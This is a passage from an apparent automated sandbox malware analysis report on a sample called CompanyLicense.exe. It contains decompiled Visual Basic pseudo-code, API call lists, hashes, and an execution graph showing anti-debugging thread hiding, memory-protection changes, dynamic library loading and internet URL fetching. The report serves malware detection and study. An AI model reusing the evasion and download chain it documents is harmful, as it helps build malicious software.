				_t16 =  *((intOrPtr*)( *_a4 + 4))(_a4, __edi, __esi, __ebx, 0x14,  *[fs:0x0], 0x4012e6, _t27);
				_push(0x403c50);
				L00401376();
				L0040141E();
				_push(_t16);
				_push(0x403c58);
				L004013B8();
				asm("sbb eax, eax");
				_v36 =  ~( ~( ~_t16));
				L0040140C();
				_t20 = _v36;
				if(_t20 != 0) {
					_push(0x2f);
					L00401370();
					_v28 = _t20;
				}
				_push(0x411b6d);
				return _t20;
			}














                                      0x00411ada
                                      0x00411ae9
                                      0x00411af3
                                      0x00411afb
                                      0x00411afe
                                      0x00411b05
                                      0x00411b14
                                      0x00411b17
                                      0x00411b1c
                                      0x00411b26
                                      0x00411b2b
                                      0x00411b2c
                                      0x00411b31
                                      0x00411b38
                                      0x00411b3e
                                      0x00411b45
                                      0x00411b4a
                                      0x00411b50
                                      0x00411b52
                                      0x00411b54
                                      0x00411b59
                                      0x00411b59
                                      0x00411b5c
                                      0x00000000

                                      APIs
                                      • __vbaChkstk.MSVBVM60(?,004012E6), ref: 00411AF3
                                      • #527.MSVBVM60(00403C50,?,?,?,?,004012E6), ref: 00411B1C
                                      • __vbaStrMove.MSVBVM60(00403C50,?,?,?,?,004012E6), ref: 00411B26
                                      • __vbaStrCmp.MSVBVM60(00403C58,00000000,00403C50,?,?,?,?,004012E6), ref: 00411B31
                                      • __vbaFreeStr.MSVBVM60(00403C58,00000000,00403C50,?,?,?,?,004012E6), ref: 00411B45
                                      • #569.MSVBVM60(0000002F,00403C58,00000000,00403C50,?,?,?,?,004012E6), ref: 00411B54
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.667445520.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.667442253.0000000000400000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.667457492.0000000000413000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.667461596.0000000000415000.00000002.00020000.sdmp Download File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_CompanyLicense.jbxd
                                      Similarity
                                      • API ID: __vba$#527#569ChkstkFreeMove
                                      • String ID:
                                      • API String ID: 1161317979-0
                                      • Opcode ID: a32b04e446ce3a497a6355b8a851c52fef2ae955206f86cb34846f6d8a3d4b4a
                                      • Instruction ID: 4d12b6788da6921758621beb10029e76731b365777bc50c3df8fdd1bf8bd2940
                                      • Opcode Fuzzy Hash: a32b04e446ce3a497a6355b8a851c52fef2ae955206f86cb34846f6d8a3d4b4a
                                      • Instruction Fuzzy Hash: 73017134A40209ABDB00AFA5C842FAE7BB8AF04B40F10817AF501FB5F1EB7C59408759
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 004116B5, Relevance: 7.6, APIs: 5, Instructions: 58COMMON
                                      Download Yara Rule
                                      C-Code - Quality: 51%
                                      			E004116B5(void* __ebx, void* __ecx, void* __edi, void* __esi) {
				intOrPtr _v8;
				intOrPtr _v12;
				char _v32;
				intOrPtr* _v36;
				signed int _v40;
				intOrPtr* _v48;
				signed int _v52;
				char* _t26;
				signed int _t29;
				intOrPtr _t40;

				_push(0x4012e6);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t40;
				_push(0x20);
				L004012E0();
				_v12 = _t40;
				_v8 = 0x401288;
				if( *0x413010 != 0) {
					_v48 = 0x413010;
				} else {
					_push(0x413010);
					_push(0x402b8c);
					L0040142A();
					_v48 = 0x413010;
				}
				_t26 =  &_v32;
				L00401430();
				_v36 = _t26;
				_t29 =  *((intOrPtr*)( *_v36 + 0x1a8))(_v36, _t26,  *((intOrPtr*)( *((intOrPtr*)( *_v48)) + 0x300))( *_v48));
				asm("fclex");
				_v40 = _t29;
				if(_v40 >= 0) {
					_v52 = _v52 & 0x00000000;
				} else {
					_push(0x1a8);
					_push(0x403ac4);
					_push(_v36);
					_push(_v40);
					L0040145A();
					_v52 = _t29;
				}
				L0040144E();
				asm("wait");
				_push(0x41177b);
				return _t29;
			}













                                      0x004116ba
                                      0x004116c5
                                      0x004116c6
                                      0x004116cd
                                      0x004116d0
                                      0x004116d8
                                      0x004116db
                                      0x004116e9
                                      0x00411703
                                      0x004116eb
                                      0x004116eb
                                      0x004116f0
                                      0x004116f5
                                      0x004116fa
                                      0x004116fa
                                      0x0041171e
                                      0x00411722
                                      0x00411727
                                      0x00411732
                                      0x00411738
                                      0x0041173a
                                      0x00411741
                                      0x0041175d
                                      0x00411743
                                      0x00411743
                                      0x00411748
                                      0x0041174d
                                      0x00411750
                                      0x00411753
                                      0x00411758
                                      0x00411758
                                      0x00411764
                                      0x00411769
                                      0x0041176a
                                      0x00000000

                                      APIs
                                      • __vbaChkstk.MSVBVM60(?,004012E6), ref: 004116D0
                                      • __vbaNew2.MSVBVM60(00402B8C,00413010,?,?,?,?,004012E6), ref: 004116F5
                                      • __vbaObjSet.MSVBVM60(?,00000000,?,?,?,?,?,?,?,?,004012E6), ref: 00411722
                                      • __vbaHresultCheckObj.MSVBVM60(00000000,?,00403AC4,000001A8,?,?,?,?,?,?,?,?,004012E6), ref: 00411753
                                      • __vbaFreeObj.MSVBVM60(?,?,?,?,?,?,?,?,004012E6), ref: 00411764
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.667445520.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.667442253.0000000000400000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.667457492.0000000000413000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.667461596.0000000000415000.00000002.00020000.sdmp Download File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_CompanyLicense.jbxd
                                      Similarity
                                      • API ID: __vba$CheckChkstkFreeHresultNew2
                                      • String ID:
                                      • API String ID: 4127847336-0
                                      • Opcode ID: f8580a5453b2530fc23ef433abbfb0f0ebd4ae4e31724340d7c6ff473b24ef7d
                                      • Instruction ID: c0aaf02476ce0a8e4f84cfcd2f620ec5539b16ec191209a4eb2ff413db34f8aa
                                      • Opcode Fuzzy Hash: f8580a5453b2530fc23ef433abbfb0f0ebd4ae4e31724340d7c6ff473b24ef7d
                                      • Instruction Fuzzy Hash: 6E111770A00208AFCB00DFA5C849FDDBBB8FB09705F20856AF511B72A1C77D5941DB29
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00411437, Relevance: 7.5, APIs: 5, Instructions: 35COMMON
                                      Download Yara Rule
                                      C-Code - Quality: 85%
                                      			E00411437(void* __ebx, void* __edi, void* __esi, intOrPtr* _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				void* _v28;
				char _v40;
				char _v48;
				char* _t18;
				void* _t26;
				void* _t28;
				intOrPtr _t29;

				_t29 = _t28 - 0xc;
				 *[fs:0x0] = _t29;
				L004012E0();
				_v16 = _t29;
				_v12 = 0x401258;
				_v8 = 0;
				 *((intOrPtr*)( *_a4 + 4))(_a4, __edi, __esi, __ebx, 0x30,  *[fs:0x0], 0x4012e6, _t26);
				_v40 = 2;
				_v48 = 2;
				_t18 =  &_v48;
				_push(_t18);
				L004013A0();
				L0040141E();
				L0040143C();
				_push(0x4114b9);
				L0040140C();
				return _t18;
			}













                                      0x0041143a
                                      0x00411449
                                      0x00411453
                                      0x0041145b
                                      0x0041145e
                                      0x00411465
                                      0x00411474
                                      0x00411477
                                      0x0041147e
                                      0x00411485
                                      0x00411488
                                      0x00411489
                                      0x00411493
                                      0x0041149b
                                      0x004114a0
                                      0x004114b3
                                      0x004114b8

                                      APIs
                                      • __vbaChkstk.MSVBVM60(?,004012E6), ref: 00411453
                                      • #536.MSVBVM60(00000002), ref: 00411489
                                      • __vbaStrMove.MSVBVM60(00000002), ref: 00411493
                                      • __vbaFreeVar.MSVBVM60(00000002), ref: 0041149B
                                      • __vbaFreeStr.MSVBVM60(004114B9,00000002), ref: 004114B3
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.667445520.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.667442253.0000000000400000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.667457492.0000000000413000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.667461596.0000000000415000.00000002.00020000.sdmp Download File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_CompanyLicense.jbxd
                                      Similarity
                                      • API ID: __vba$Free$#536ChkstkMove
                                      • String ID:
                                      • API String ID: 2104488870-0
                                      • Opcode ID: 4d3dd28cf59827caa04d209e24bcdec927641bd5309243f33278595d2d676ed9
                                      • Instruction ID: 6e137ad59e1bd904b46978aff12423ae5b23b1d0861eca15e6423218e8cd172a
                                      • Opcode Fuzzy Hash: 4d3dd28cf59827caa04d209e24bcdec927641bd5309243f33278595d2d676ed9
                                      • Instruction Fuzzy Hash: 8B013174900208ABCB00EFA5C986BDEBBB8AF04744F50816AF501B71A1D77C9945CB9D
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00410E93, Relevance: 7.5, APIs: 5, Instructions: 35COMMON
                                      Download Yara Rule
                                      C-Code - Quality: 62%
                                      			E00410E93(void* __ebx, void* __edi, void* __esi, long long __fp0, intOrPtr* _a4, void* _a20) {
				intOrPtr _v8;
				intOrPtr _v12;
				long long* _v16;
				char _v40;
				void* _t14;
				char* _t16;
				void* _t21;
				void* _t23;
				long long* _t24;

				_t24 = _t23 - 0xc;
				 *[fs:0x0] = _t24;
				L004012E0();
				_v16 = _t24;
				_v12 = 0x401208;
				_v8 = 0;
				_t14 =  *((intOrPtr*)( *_a4 + 4))(_a4, __edi, __esi, __ebx, 0x18,  *[fs:0x0], 0x4012e6, _t21);
				_t16 =  &_v40;
				L00401412();
				asm("fldz");
				_push(_t16);
				_push(_t16);
				 *_t24 = __fp0;
				L004013D6();
				L004013DC();
				asm("fcomp qword [0x401200]");
				asm("wait");
				_push(0x410f04);
				L0040143C();
				return _t14;
			}












                                      0x00410e96
                                      0x00410ea5
                                      0x00410eaf
                                      0x00410eb7
                                      0x00410eba
                                      0x00410ec1
                                      0x00410ed0
                                      0x00410ed6
                                      0x00410ed9
                                      0x00410ede
                                      0x00410ee0
                                      0x00410ee1
                                      0x00410ee2
                                      0x00410ee5
                                      0x00410eea
                                      0x00410eef
                                      0x00410ef5
                                      0x00410ef6
                                      0x00410efe
                                      0x00410f03

                                      APIs
                                      • __vbaChkstk.MSVBVM60(?,004012E6), ref: 00410EAF
                                      • __vbaVarDup.MSVBVM60(?,?,?,?,004012E6), ref: 00410ED9
                                      • #586.MSVBVM60(?,?,?,?,?,?,004012E6), ref: 00410EE5
                                      • __vbaFpR8.MSVBVM60(?,?,?,?,?,?,004012E6), ref: 00410EEA
                                      • __vbaFreeVar.MSVBVM60(00410F04,?,?,?,?,?,?,004012E6), ref: 00410EFE
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.667445520.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.667442253.0000000000400000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.667457492.0000000000413000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.667461596.0000000000415000.00000002.00020000.sdmp Download File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_CompanyLicense.jbxd
                                      Similarity
                                      • API ID: __vba$#586ChkstkFree
                                      • String ID:
                                      • API String ID: 1198234147-0
                                      • Opcode ID: eb471ee9643b88fa207f38bbfd592858992b61494404b2e6dbd64ca7e812b81f
                                      • Instruction ID: 8b06fd58f1f951ba07d5b71ec4789900f5daed13fd88298029dea63f756d61bb
                                      • Opcode Fuzzy Hash: eb471ee9643b88fa207f38bbfd592858992b61494404b2e6dbd64ca7e812b81f
                                      • Instruction Fuzzy Hash: E9F04F70900209ABCB00EF95C946F9DBBB8EF04744F5085AEF400B71B1DBB85A44CB98
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Analysis Process: CompanyLicense.exe PID: 6572 Parent PID: 5148 CompanyLicense.exeCOMMON

                                      Execution Graph

                                      Execution Coverage:3.8%
                                      Dynamic/Decrypted Code Coverage:100%
                                      Signature Coverage:0%
                                      Total number of Nodes:412
                                      Total number of Limit Nodes:14

                                      Graph

                                      execution_graph 1963 564016 1964 56411e 1963->1964 1972 56414a CreateFileA 1964->1972 1966 564127 1971 56419a 1966->1971 1973 564134 1966->1973 1967 567679 GetPEB 1969 568078 1967->1969 1970 5641b6 1971->1967 1971->1970 1972->1966 1978 56414a CreateFileA 1973->1978 1975 56413d 1975->1971 1976 567679 GetPEB 1975->1976 1977 568078 1976->1977 1978->1975 1979 568517 1980 568607 1979->1980 1981 568832 1980->1981 1989 56865d 1980->1989 1984 5689a5 1981->1984 1985 568858 1981->1985 1983 568a03 1994 568b16 NtProtectVirtualMemory 1984->1994 1993 568b16 NtProtectVirtualMemory 1985->1993 1986 563cc1 1989->1986 1992 568b16 NtProtectVirtualMemory 1989->1992 1990 56899f 1991 56882f 1992->1991 1993->1990 1994->1983 2132 562dd2 2133 562ed0 TerminateThread 2132->2133 2134 563e8d 2133->2134 2135 562ed5 __common_dcos_data TerminateThread 2134->2135 2136 563e92 __common_dcos_data 2135->2136 2235 568692 2236 56866c 2235->2236 2237 563cc1 2236->2237 2240 568b16 NtProtectVirtualMemory 2236->2240 2239 56882f 2240->2239 1995 564010 1996 56411e 1995->1996 2004 56414a CreateFileA 1996->2004 1998 567679 GetPEB 2001 568078 1998->2001 1999 564127 2000 564134 2 API calls 1999->2000 2003 56419a 1999->2003 2000->2003 2002 5641b6 2003->1998 2003->2002 2004->1999 2137 5636d0 2138 56366c 2137->2138 2139 5636a7 2137->2139 2138->2139 2140 568ec1 2 API calls 2138->2140 2141 563a12 2139->2141 2142 568ec1 2 API calls 2139->2142 2140->2139 2143 568ec1 2 API calls 2141->2143 2149 5637fd __common_dcos_data 2142->2149 2144 563a23 2143->2144 2145 568ec1 2 API calls 2144->2145 2146 563a33 2145->2146 2147 568ec1 2 API calls 2146->2147 2148 563a46 2147->2148 2149->2141 2150 568ec1 2 API calls 2149->2150 2151 5639ca 2150->2151 2151->2141 2152 568ec1 2 API calls 2151->2152 2153 5639f7 2152->2153 2153->2141 2154 5639fc 2153->2154 2155 568ec1 2 API calls 2154->2155 2156 563a11 2155->2156 2021 563d1e 2022 563d27 2021->2022 2023 563cb8 2021->2023 2027 562d8f 2022->2027 2025 567c59 GetPEB 2026 563e20 __common_dcos_data 2025->2026 2026->2025 2028 562dbb TerminateThread 2027->2028 2030 562ed0 TerminateThread 2028->2030 2031 563e8d 2030->2031 2032 562ed5 __common_dcos_data TerminateThread 2031->2032 2033 563e92 __common_dcos_data 2032->2033 2033->2026 2157 5686da 2158 56866c 2157->2158 2161 563cc1 2158->2161 2162 568b16 NtProtectVirtualMemory 2158->2162 2160 56882f 2161->2161 2162->2160 2034 563d19 2035 563e16 2034->2035 2036 562d8f 3 API calls 2035->2036 2038 563e20 __common_dcos_data 2035->2038 2036->2038 2037 567c59 GetPEB 2037->2038 2038->2037 2241 564984 2242 56498b 2241->2242 2243 564a8c 2242->2243 2244 568ec1 2 API calls 2242->2244 2245 568ec1 2 API calls 2243->2245 2244->2243 2246 564aa0 2245->2246 2039 56910c 2040 568ecb 2039->2040 2042 5690eb 2039->2042 2041 567c59 GetPEB 2040->2041 2041->2042 2043 5695a7 2042->2043 2044 56958c NtSetInformationThread 2042->2044 2045 56959b 2044->2045 2045->2045 2163 5634cd 2164 563468 2163->2164 2165 568ec1 2 API calls 2164->2165 2166 563658 2165->2166 2167 563a12 2166->2167 2169 568ec1 2 API calls 2166->2169 2168 568ec1 2 API calls 2167->2168 2170 563a23 2168->2170 2171 5636a7 2169->2171 2172 568ec1 2 API calls 2170->2172 2171->2167 2175 568ec1 2 API calls 2171->2175 2173 563a33 2172->2173 2174 568ec1 2 API calls 2173->2174 2176 563a46 2174->2176 2177 5637fd __common_dcos_data 2175->2177 2177->2167 2178 568ec1 2 API calls 2177->2178 2179 5639ca 2178->2179 2179->2167 2180 568ec1 2 API calls 2179->2180 2181 5639f7 2180->2181 2181->2167 2182 5639fc 2181->2182 2183 568ec1 2 API calls 2182->2183 2184 563a11 2183->2184 1909 56414a CreateFileA 1932 56474b 1933 56474c InternetOpenA 1932->1933 1934 564767 1933->1934 1935 564abd 1933->1935 1936 568ec1 2 API calls 1934->1936 1937 564797 1936->1937 1937->1935 1938 5648b3 InternetOpenUrlA 1937->1938 1938->1935 1939 5648d9 1938->1939 1939->1935 1940 568ec1 2 API calls 1939->1940 1941 56496d 1939->1941 1940->1939 1942 568ec1 2 API calls 1941->1942 1943 564a8c 1942->1943 1944 568ec1 2 API calls 1943->1944 1945 564aa0 1944->1945 1946 569248 1947 568ecb 1946->1947 1948 5690eb 1946->1948 1947->1946 1947->1948 1949 567c59 GetPEB 1947->1949 1948->1948 1950 5695a7 1948->1950 1951 56958c NtSetInformationThread 1948->1951 1949->1948 1952 56959b 1951->1952 1952->1952 2046 569436 2047 569548 2046->2047 2048 5695a7 2046->2048 2047->2048 2049 56958c NtSetInformationThread 2047->2049 2050 56959b 2049->2050 2050->2050 2051 564234 2052 5641d0 2051->2052 2053 567679 GetPEB 2052->2053 2054 568078 2053->2054 2055 568b34 2056 5632a6 2055->2056 2064 568b47 2055->2064 2088 56833c 2056->2088 2058 5632bd 2117 566f42 GetPEB 2058->2117 2060 563400 2061 568ec1 2 API calls 2060->2061 2062 56340e 2061->2062 2063 563a12 2062->2063 2118 566f5a 2062->2118 2065 568ec1 2 API calls 2063->2065 2067 563a23 2065->2067 2069 568ec1 2 API calls 2067->2069 2068 563424 2070 568ec1 2 API calls 2068->2070 2071 563a33 2069->2071 2074 563435 2070->2074 2072 568ec1 2 API calls 2071->2072 2073 563a46 2072->2073 2075 568ec1 2 API calls 2074->2075 2076 563658 2075->2076 2076->2063 2077 568ec1 2 API calls 2076->2077 2078 5636a7 2077->2078 2078->2063 2079 568ec1 2 API calls 2078->2079 2080 5637fd __common_dcos_data 2079->2080 2080->2063 2081 568ec1 2 API calls 2080->2081 2082 5639ca 2081->2082 2082->2063 2083 568ec1 2 API calls 2082->2083 2084 5639f7 2083->2084 2084->2063 2085 5639fc 2084->2085 2086 568ec1 2 API calls 2085->2086 2087 563a11 2086->2087 2089 566f5a 2 API calls 2088->2089 2090 568349 2089->2090 2091 566f5a 2 API calls 2090->2091 2092 56835a __common_dcos_data 2091->2092 2093 568363 GetPEB 2092->2093 2094 568476 2093->2094 2095 568485 2094->2095 2096 566f5a 2094->2096 2128 568b16 NtProtectVirtualMemory 2095->2128 2097 5670a8 LoadLibraryA 2096->2097 2101 567679 GetPEB 2096->2101 2099 5670b3 2097->2099 2099->2058 2100 563cc1 2100->2058 2102 56706a 2101->2102 2103 56709b 2102->2103 2104 567679 GetPEB 2102->2104 2103->2097 2105 56708c 2104->2105 2105->2103 2107 567679 GetPEB 2105->2107 2106 5684c3 2106->2100 2108 568832 2106->2108 2115 56865d 2106->2115 2107->2103 2111 5689a5 2108->2111 2112 568858 2108->2112 2110 568a03 2110->2058 2131 568b16 NtProtectVirtualMemory 2111->2131 2130 568b16 NtProtectVirtualMemory 2112->2130 2115->2100 2129 568b16 NtProtectVirtualMemory 2115->2129 2116 56899f 2116->2058 2117->2060 2119 5670a8 LoadLibraryA 2118->2119 2120 566f68 2118->2120 2121 5670b3 2119->2121 2122 567679 GetPEB 2120->2122 2121->2068 2123 56706a 2122->2123 2124 567679 GetPEB 2123->2124 2125 56709b 2123->2125 2126 56708c 2124->2126 2125->2119 2126->2125 2127 567679 GetPEB 2126->2127 2127->2125 2128->2106 2129->2100 2130->2116 2131->2110 2247 564eb5 2248 566f5a 2 API calls 2247->2248 2249 564ec5 2248->2249 2250 566f5a 2 API calls 2249->2250 2251 564ed5 2250->2251 1852 5647b3 1853 56474c InternetOpenA 1852->1853 1854 564797 1852->1854 1856 564767 1853->1856 1857 564abd 1853->1857 1855 5648b3 InternetOpenUrlA 1854->1855 1854->1857 1855->1857 1860 5648d9 1855->1860 1866 568ec1 1856->1866 1859 568ec1 2 API calls 1859->1860 1860->1857 1860->1859 1861 56496d 1860->1861 1862 568ec1 2 API calls 1861->1862 1863 564a8c 1862->1863 1864 568ec1 2 API calls 1863->1864 1865 564aa0 1864->1865 1868 568ec6 1866->1868 1869 568ecb 1868->1869 1875 567c59 1869->1875 1871 5690eb 1872 5695a7 1871->1872 1873 56958c NtSetInformationThread 1871->1873 1874 56959b 1873->1874 1874->1874 1878 567679 GetPEB 1875->1878 1877 567c66 1877->1871 1879 56768d 1878->1879 1879->1877 2185 5662f3 2186 5663f8 GetLongPathNameW 2185->2186 2188 566460 2186->2188 2187 5663f4 GetLongPathNameW 2187->2188 2188->2187 2189 566533 2188->2189 1880 56837e 1881 568485 1880->1881 1882 566f5a 1880->1882 1903 568b16 NtProtectVirtualMemory 1881->1903 1883 5670a8 LoadLibraryA 1882->1883 1887 567679 GetPEB 1882->1887 1885 5670b3 1883->1885 1886 563cc1 1888 56706a 1887->1888 1889 56709b 1888->1889 1890 567679 GetPEB 1888->1890 1889->1883 1891 56708c 1890->1891 1891->1889 1894 567679 GetPEB 1891->1894 1892 568832 1895 5689a5 1892->1895 1899 568858 1892->1899 1893 5684c3 1893->1886 1893->1892 1896 56865d 1893->1896 1894->1889 1906 568b16 NtProtectVirtualMemory 1895->1906 1896->1886 1904 568b16 NtProtectVirtualMemory 1896->1904 1898 568a03 1905 568b16 NtProtectVirtualMemory 1899->1905 1902 56899f 1903->1893 1904->1886 1905->1902 1906->1898 2190 5696fd 2191 569702 2190->2191 2193 562c10 2190->2193 2194 562db8 TerminateThread 2193->2194 2196 562ed0 TerminateThread 2194->2196 2197 563e8d 2196->2197 2198 562ed5 __common_dcos_data TerminateThread 2197->2198 2199 563e92 __common_dcos_data 2198->2199 2199->2191 1914 562db8 1915 562dbb 1914->1915 1915->1915 1916 562ec8 TerminateThread 1915->1916 1917 562ed0 TerminateThread 1916->1917 1918 563e8d 1917->1918 1921 562ed5 1918->1921 1920 563e92 __common_dcos_data 1922 562edf 1921->1922 1923 562ed0 TerminateThread 1922->1923 1924 562ee4 __common_dcos_data 1922->1924 1925 563e8d __common_dcos_data 1923->1925 1924->1920 1925->1920 2200 5662f8 2201 566294 2200->2201 2202 566303 GetLongPathNameW 2200->2202 2204 566460 2202->2204 2203 5663f4 GetLongPathNameW 2203->2204 2204->2203 2205 566533 2204->2205 1926 5695b9 1927 5695c3 1926->1927 1929 569554 1926->1929 1928 5695a7 1929->1928 1930 56958c NtSetInformationThread 1929->1930 1931 56959b 1930->1931 1931->1931 2252 5632a6 2253 56833c 5 API calls 2252->2253 2254 5632bd 2253->2254 2283 566f42 GetPEB 2254->2283 2256 563400 2257 568ec1 2 API calls 2256->2257 2258 56340e 2257->2258 2259 563a12 2258->2259 2261 566f5a 2 API calls 2258->2261 2260 568ec1 2 API calls 2259->2260 2262 563a23 2260->2262 2263 563424 2261->2263 2264 568ec1 2 API calls 2262->2264 2265 568ec1 2 API calls 2263->2265 2266 563a33 2264->2266 2267 563435 2265->2267 2268 568ec1 2 API calls 2266->2268 2270 568ec1 2 API calls 2267->2270 2269 563a46 2268->2269 2271 563658 2270->2271 2271->2259 2272 568ec1 2 API calls 2271->2272 2273 5636a7 2272->2273 2273->2259 2274 568ec1 2 API calls 2273->2274 2275 5637fd __common_dcos_data 2274->2275 2275->2259 2276 568ec1 2 API calls 2275->2276 2277 5639ca 2276->2277 2277->2259 2278 568ec1 2 API calls 2277->2278 2279 5639f7 2278->2279 2279->2259 2280 5639fc 2279->2280 2281 568ec1 2 API calls 2280->2281 2282 563a11 2281->2282 2283->2256 2206 5635e7 2207 5635f2 2206->2207 2208 563658 2207->2208 2209 568ec1 2 API calls 2207->2209 2210 563a12 2208->2210 2212 568ec1 2 API calls 2208->2212 2209->2208 2211 568ec1 2 API calls 2210->2211 2213 563a23 2211->2213 2214 5636a7 2212->2214 2215 568ec1 2 API calls 2213->2215 2214->2210 2218 568ec1 2 API calls 2214->2218 2216 563a33 2215->2216 2217 568ec1 2 API calls 2216->2217 2219 563a46 2217->2219 2220 5637fd __common_dcos_data 2218->2220 2220->2210 2221 568ec1 2 API calls 2220->2221 2222 5639ca 2221->2222 2222->2210 2223 568ec1 2 API calls 2222->2223 2224 5639f7 2223->2224 2224->2210 2225 5639fc 2224->2225 2226 568ec1 2 API calls 2225->2226 2227 563a11 2226->2227 2284 5638a7 2285 563997 2284->2285 2286 563a12 2285->2286 2288 568ec1 2 API calls 2285->2288 2287 568ec1 2 API calls 2286->2287 2289 563a23 2287->2289 2290 5639ca 2288->2290 2291 568ec1 2 API calls 2289->2291 2290->2286 2293 568ec1 2 API calls 2290->2293 2292 563a33 2291->2292 2295 568ec1 2 API calls 2292->2295 2294 5639f7 2293->2294 2294->2286 2296 5639fc 2294->2296 2297 563a46 2295->2297 2298 568ec1 2 API calls 2296->2298 2299 563a11 2298->2299 2300 5689a2 2301 5689a5 2300->2301 2304 568b16 NtProtectVirtualMemory 2301->2304 2303 568a03 2304->2303 2228 568fe0 2229 568ecb 2228->2229 2230 567c59 GetPEB 2229->2230 2231 5690eb 2230->2231 2232 5695a7 2231->2232 2233 56958c NtSetInformationThread 2231->2233 2234 56959b 2233->2234 2234->2234 1907 56726e LoadLibraryA 1908 567286 1907->1908 1953 566f6e 1954 56705d 1953->1954 1955 567679 GetPEB 1954->1955 1956 56706a 1955->1956 1957 56709b 1956->1957 1958 567679 GetPEB 1956->1958 1960 5670a8 LoadLibraryA 1957->1960 1959 56708c 1958->1959 1959->1957 1961 567679 GetPEB 1959->1961 1962 5670b3 1960->1962 1961->1957 2305 563eaf 2307 563eb3 __common_dcos_data 2305->2307 2308 563e20 __common_dcos_data 2305->2308 2306 567c59 GetPEB 2306->2308 2308->2306 1910 56652a 1911 566460 1910->1911 1913 566533 1910->1913 1911->1910 1912 5663f4 GetLongPathNameW 1911->1912 1912->1911 2309 563cab GetPEB 2310 563cb8 2309->2310

                                      Executed Functions

                                      Function 00569248, Relevance: 1.8, APIs: 1, Instructions: 333nativethreadCOMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 47 569248-569251 48 5691e4-5691ea 47->48 49 569253-569299 47->49 50 5691eb-5691ed 48->50 52 56922c-56922d 49->52 53 56929b-5692ea 49->53 54 5691f0-5691f7 50->54 55 5691c0-5691c9 52->55 56 56922f-569247 52->56 57 5692ee-569414 53->57 54->54 60 5691f9 54->60 58 56915c-56915d 55->58 59 5691cb-5691e3 55->59 56->47 64 569419-569421 57->64 62 5690f0-5690fd 58->62 63 56915f-5691bf 58->63 59->48 60->57 66 569090-569099 62->66 67 5690ff-56915a 62->67 63->55 64->64 65 569423-56953a 64->65 79 5695a7-5696fa call 5696cf 65->79 80 56953c-569546 65->80 69 56902c-56902d 66->69 70 56909b-5690c6 66->70 67->58 71 568fc0-568fd3 69->71 72 56902f-56908f 69->72 73 5690cb-5690d9 70->73 71->69 72->66 75 5690df-5690ee call 567c59 73->75 76 568ecb-568fda 73->76 75->50 76->73 80->79 83 569548-56954c 80->83 83->79 86 56954e-569552 83->86 86->79 88 569554-56955b 86->88 88->79 90 56955d-569561 88->90 90->79 92 569563-569567 90->92 92->79 93 569569-569576 92->93 93->79 94 569578-569580 93->94 94->79 95 569582-56958a 94->95 95->79 96 56958c-569596 NtSetInformationThread 95->96 97 56959b-5695a3 96->97 97->97 98 5695a5 97->98 98->98
                                      APIs
                                      • NtSetInformationThread.NTDLL ref: 0056958E
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.998526794.0000000000562000.00000040.00000001.sdmp, Offset: 00562000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_562000_CompanyLicense.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: InformationThread
                                      • String ID:
                                      • API String ID: 4046476035-0
                                      • Opcode ID: 1da4b11abcea70f6f38c6bd4cfe5ca3e0442990a793d84590e8cdcd952b51640
                                      • Instruction ID: 0a1be0992238693e35cf3666cb125c100ab41819d604686a3222fff7c7ca5411
                                      • Opcode Fuzzy Hash: 1da4b11abcea70f6f38c6bd4cfe5ca3e0442990a793d84590e8cdcd952b51640
                                      • Instruction Fuzzy Hash: 39C1CD15C4D8CB47C61302B55469284FFBB3EA3934FC922DA9DA603636DB622DB487D3
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0056833C, Relevance: 1.8, APIs: 1, Instructions: 270COMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
